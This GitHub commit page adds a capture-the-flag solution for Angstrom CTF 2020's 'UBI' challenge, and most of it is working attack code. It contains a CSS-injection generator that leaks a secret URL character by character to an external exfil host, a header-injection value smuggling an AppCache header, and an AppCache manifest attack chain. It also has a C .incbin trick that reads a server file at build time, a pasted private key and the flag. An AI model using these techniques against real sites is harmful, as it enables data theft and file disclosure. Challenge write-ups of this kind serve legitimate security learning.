Skip to content
Permalink
Browse files

Add UBI from Angstrom CTF

  • Loading branch information
sampritipanda committed Mar 19, 2020
1 parent 7056d8f commit e9fa4ad198d61f005e7069c2ffb6ae4813efa291
@@ -0,0 +1,11 @@
UBI
===

You could do the AppCache exploit and write a ton of exploit code that's in `solve.py`.

Or you could realize that `puppeteer` uses a outdated version of Chrome and use a already available Chrome N-day
to solve the challenge.

Exploit:
https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping/
https://blog.exodusintel.com/wp-content/uploads/2020/02/exp.zip
@@ -0,0 +1,21 @@
import sys
import requests
import hashlib
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA

privkey = open('real_privkey', 'rb').read()
keyid = hashlib.sha256(privkey).hexdigest()

file_name = sys.argv[1]

src = open(file_name, 'rb').read()
# referer = 'https://flags.2020.chall.actf.co/'
referer = None

# HOST = "http://0.0.0.0:5000"
HOST = "https://ubi.2020.chall.actf.co"

resp = requests.post(HOST + "/build", data={"src": src, "key": privkey, "referer": referer})
print resp.text.strip()
@@ -0,0 +1,38 @@
import sys
import requests
import hashlib
from Cryptodome.Cipher import PKCS1_OAEP
from Cryptodome.Hash import SHA256
from Cryptodome.PublicKey import RSA
import urllib

# HOST_FLAG = "http://0.0.0.0:5001"
HOST_FLAG = "https://flags.2020.chall.actf.co"

# HOST_UBI = "http://0.0.0.0:5000"
HOST_UBI = "https://ubi.2020.chall.actf.co"

privkey = open('real_privkey', 'rb').read()
keyid = hashlib.sha256(privkey).hexdigest()
build = sys.argv[1]
key = RSA.import_key(privkey)

content_type = sys.argv[2]

# referer = 'https://flags.2020.chall.actf.co/'
referer = None
headers = {'x-ubi-src': "1\nX-AppCache-Allowed: /", 'content-type': content_type}
# headers = {'content-type': content_type}

header_string = '\n'.join(header+': '+headers[header] for header in sorted(headers.keys()))
ubi_key = SHA256.new(key.export_key('PEM', pkcs=8)+chr(10)).hexdigest()
header_string += "\nx-ubi-id: {}\nx-ubi-key: {}".format(build, ubi_key)
# print header_string
h = SHA256.new(header_string.encode('utf-8')).digest()
sig = PKCS1_OAEP.new(key).encrypt(h).encode('hex')

url = HOST_FLAG+'/download/'+build+'/flag?'+urllib.urlencode(headers)+'&sig='+sig
print url

url2 = HOST_UBI + '/' + build + '/flag?'+urllib.urlencode(headers)+'&sig='+sig
# print url2
@@ -0,0 +1 @@
actf{seize_the_means_of_c0mp1l4tion}
@@ -0,0 +1,18 @@
import sys

curr = sys.argv[1]

charset = "0123456789abcdef"

style = ""

for c in charset:
style += """
.is-parent:nth-child(5) a[href^="https://flags.2020.chall.actf.co/download/{}"] {{
background: url(https://hax.perfect.blue/exfil/{});
}}
""".format(curr+c, curr+c)

f = open("style_sice.css", "wb")
f.write(style)
f.close()
@@ -0,0 +1,28 @@
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDTSKnSxPcozReK
q71KujtT6yumgj5vV1wLocoD8GCEFGYaK/KywwXcueEH9UaAx9RrnReDC5CMLw1R
zLkKCS9jvbxOEBRQ7ZH2zlfXeYwde7QrqV0HqPYl1m6L9+6aibbKnsx3ueMp1Ssr
PfZhDvC5HM9+cPKWqsWUpvOHyT9EOvMIJ3WK0HST8nYx/3YA3yBKgaU7VxI56nUc
G0BXhaVsLX3IHgDf90Vy4a1IaMXeYZanEsQGbVYQwqmC48Br1jG0ZjBprBe3kwop
WJ+1Lde+J5yFht8EtPQdNcZFqKlGrZ+Ff/iBYa4z7JT9GnEhQ11lcPl/wSllK6mu
o6Wetp/TAgMBAAECggEAduMjVAsq/FVzUr9Sc1MZgR4KYNZW5XXlwFHYh6Dh3lBQ
J5flJ/ufN9WML1svwdUvzSIHEeEXBBqRxx6IXIJQnTItXEul8ufLQ3JWcVPeqNRr
zEmvpFjJsP7ZE39+To0BQ0BZ02DQ10Aw21MxaOnsQG1awE4z4t3S8dODozt1kyEF
szmUllbNhkohhoPuqkNuyy/NaSig1p/reTyVct055tYq+MsE7cMrbqoWB0skgpvA
Qmf4P7/JsFe76l1lgxKAs1J/L/S+DIg9YNgEY3vx4mJeVV/eBfU+r2g9utw2IhgK
Y/T35GMakAk+Jlf9dB7ZoXFvdASof919FLOrJhzGkQKBgQD/RzHUhI1rU+ivjG2H
Sn2/9IpeM9p1VK7/sJ1tQLmziVP3dIegLMgGcf5nBN5+QuzmLRR4UvlQpFowvxB2
h1RhULh/IJPBmy7usWwlPREKt05nzQxk05n93KnfaXXjQHztffEcu80MkkSeC4dd
mW3RxMSFggzLofzH5F7aEbcUewKBgQDT4Z6gUumlHj83fAMXuzfgbNtDKa7KJgfR
BLjHNxJ/fRDP5edoGgQCj4dA5SC4mM8hb4Qq5SMGn5+Kcg2r87W/qQ4wjpP3Yq0/
sPMSWYKGvmLaktn2MqpYKhqA2o94VYzHE+Jw8F7/c5qws1FWRSsGIYmXUpjy33U9
T+PYH87eiQKBgQDIZSQ592Bo67LS9EMbHKAAq0Bf2QbaaoMCF6xNkqz0wo5WyHSb
ievwG1ahmpHqvjDoNGVIW6J56rseXy7WTUAxMMPUkEdNibvbBw6lYP3a0rFLDQ14
rR/KyInV5xzzK7GmYeKAMvExuDUDeHtoP8SVEolPYRsYU+5zINRRDe0RtwKBgB0E
JeQQ1rxtEv03N3k1g2ZxoelluPEoGiPuwJtPmHHrH7VI59Li1S/AliY1+rAtBRiw
G+p/7LcIfyHHksW8n2Q6852EuRDE67LwOamGppBrXEBQohbMQ3XFdlG1HLa/CINu
3rDWyjuzijiupfHpkQXK6/vULOv93CFkYnCDkqH5AoGBALLC6s9OdQBCGGqczgak
hRRXn6ZRjYQIVDGBUDDQzLPjTyR8pjc2aqeyx77aWr/drUza7G6QNFoR/mIvtk0s
suq+EFZM2n3YHG/bQpDTZS9vTBS42o1isI5VxNF86tRcjq+oyGWrUQc1oU6TbBYw
Js1ZaJoAO4s4xU80kcdhwRI9
-----END PRIVATE KEY-----
@@ -0,0 +1,52 @@
import subprocess
import requests
import re
import json

manifest_fmt = """CHROMIUM CACHE MANIFEST
NETWORK:
*
FALLBACK:
CHROMIUM-INTERCEPT:
/style.css return {}
CACHE:
/"""

html_fmt = """
<html manifest="{}">
<meta http-equiv="refresh" content="3;url=https://flags.2020.chall.actf.co/" />
</html>
"""

curr = "4282bb2f3f3e94cb"
for i in range(len(curr), 16):
subprocess.check_output(["python", "gen_injection.py", curr])
build_output = subprocess.check_output(["python", "build.py", "style_sice.css"])
build_id = re.search('build/(.+)/source.c', json.loads(build_output)['message']).group(1)
print build_id
css_url = subprocess.check_output(["python", "download.py", build_id, "text/css"]).strip()
print css_url
manifest = manifest_fmt.format(css_url.replace("https://flags.2020.chall.actf.co", ""))
with open("manifest.txt", "wb") as f:
f.write(manifest)
build_output = subprocess.check_output(["python", "build.py", "manifest.txt"])
build_id = re.search('build/(.+)/source.c', json.loads(build_output)['message']).group(1)
print build_id
manifest_url = subprocess.check_output(["python", "download.py", build_id, "text/cache-manifest"]).strip()
print manifest_url
html_src = html_fmt.format(manifest_url.replace("https://flags.2020.chall.actf.co", ""))
with open("attack.html", "wb") as f:
f.write(html_src)
build_output = subprocess.check_output(["python", "build.py", "attack.html"])
build_id = re.search('build/(.+)/source.c', json.loads(build_output)['message']).group(1)
print build_id
html_url = subprocess.check_output(["python", "download.py", build_id, "text/html"]).strip()
print html_url
requests.post("https://flags.2020.chall.actf.co/submit", data={"url": html_url})

next_char = raw_input("Next Char: ").strip()
curr += next_char
@@ -0,0 +1,7 @@
#include <stdio.h>

int main() {
asm("data:\n"
".incbin \"build/6d60558594d850e0/config.json\"");
}

0 comments on commit e9fa4ad

Please sign in to comment.
You can’t perform that action at this time.